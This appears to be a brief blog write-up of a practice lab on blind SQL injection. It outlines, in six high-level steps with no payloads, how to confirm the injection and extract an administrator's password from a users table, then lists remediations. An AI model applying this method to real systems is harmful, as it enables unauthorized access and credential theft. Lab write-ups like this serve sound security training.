target:
Tools Used:
browser
Burp suite
Vulnerability Summary:
Type: SQL Injection
Description:
The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.
Steps to Exploit:
1.confirm that the server is interpreting the injection as a SQL query
2.try submitting an invalid query while still preserving valid SQL syntax
3.verify that the users table exists
4.test whether specific entries exist in a table
5.determine how many characters are in the password of the administrator user.
6.determine the password
Remediation:
Use parameterized queries / prepared statements
Use server‑side input validation
Escape and sanitize user input
Lessons Learned:
Top comments (0)